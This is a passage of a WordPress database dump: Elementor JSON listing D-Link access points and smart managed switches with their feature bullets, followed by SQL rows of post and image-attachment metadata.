WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"10-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-10TS_A1_Image-LFront-510x6003-510x600.jpg\",\"id\":2644}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T \\u00a0with \\u00a0Two \\u00a0slots for 10 Gigabit SFP+<\\/p><p>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>\\u2022 D-link Green Technology conserves energy by powering down unused ports<\\/p><p>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3635,2671,'_edit_last','1'),(3636,2671,'_wp_page_template','template-fullwidth.php'),(3637,2671,'_hide_page_title',''),(3638,2671,'_hide_header',''),(3639,2671,'_hide_footer',''),(3640,2671,'_hide_breadcrumb',''),(3641,2671,'_cover',''),(3642,2671,'_show_excerpt',''),(3643,2671,'_wc_apply_product',''),(3644,2671,'_yoast_wpseo_content_score','90'),(3634,2671,'_edit_lock','1545632227:1'),(3538,2643,'_wp_attached_file','2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg'),(3539,2643,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:600;s:4:\"file\";s:57:\"2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"DXS-1210-12SC_A1_Image-LFront-510x600-510x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:57:\"DXS-1210-12SC_A1_Image-LFront-510x600-510x600-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:57:\"DXS-1210-12SC_A1_Image-LFront-510x600-510x600-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:57:\"DXS-1210-12SC_A1_Image-LFront-510x600-510x600-510x400.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:55:\"DXS-1210-12SC_A1_Image-LFront-510x600-510x600-17x20.jpg\";s:5:\"width\";i:17;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3540,2644,'_wp_attached_file','2018/12/DXS-1210-10TS_A1_Image-LFront-510x6003-510x600.jpg'),(3541,2644,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:600;s:4:\"file\";s:58:\"2018/12/DXS-1210-10TS_A1_Image-LFront-510x6003-510x600.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"DXS-1210-10TS_A1_Image-LFront-510x6003-510x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"DXS-1210-10TS_A1_Image-LFront-510x6003-510x600-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:58:\"DXS-1210-10TS_A1_Image-LFront-510x6003-510x600-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:58:\"DXS-1210-10TS_A1_Image-LFront-510x6003-510x600-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:58:\"DXS-1210-10TS_A1_Image-LFront-510x6003-510x600-510x400.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3542,2645,'_wp_attached_file','2018/12/ProductMainImage1-510x600-1.png'),(3543,2645,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:600;s:4:\"file\";s:39:\"2018/12/ProductMainImage1-510x600-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"ProductMainImage1-510x600-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"ProductMainImage1-510x600-1-255x300.png\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"ProductMainImage1-510x600-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"ProductMainImage1-510x600-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:39:\"ProductMainImage1-510x600-1-510x400.png\";s:5:\"width\";i:510;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:37:\"ProductMainImage1-510x600-1-17x20.png\";s:5:\"width\";i:17;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3544,2646,'_wp_attached_file','2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg'),(3545,2646,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:600;s:4:\"file\";s:58:\"2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:58:\"DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:58:\"DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:58:\"DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-510x400.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:56:\"DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-17x20.jpg\";s:5:\"width\";i:17;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3547,2647,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:600;s:4:\"file\";s:31:\"2018/12/DES-1510-52-510x600.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"DES-1510-52-510x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"DES-1510-52-510x600-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"DES-1510-52-510x600-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"DES-1510-52-510x600-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:31:\"DES-1510-52-510x600-510x400.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"DES-1510-52-510x600-17x20.jpg\";s:5:\"width\";i:17;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3548,2648,'_wp_attached_file','2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg'),(3549,2648,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:600;s:4:\"file\";s:58:\"2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:58:\"DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:58:\"DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:58:\"DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-510x400.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:56:\"DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-17x20.jpg\";s:5:\"width\";i:17;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s: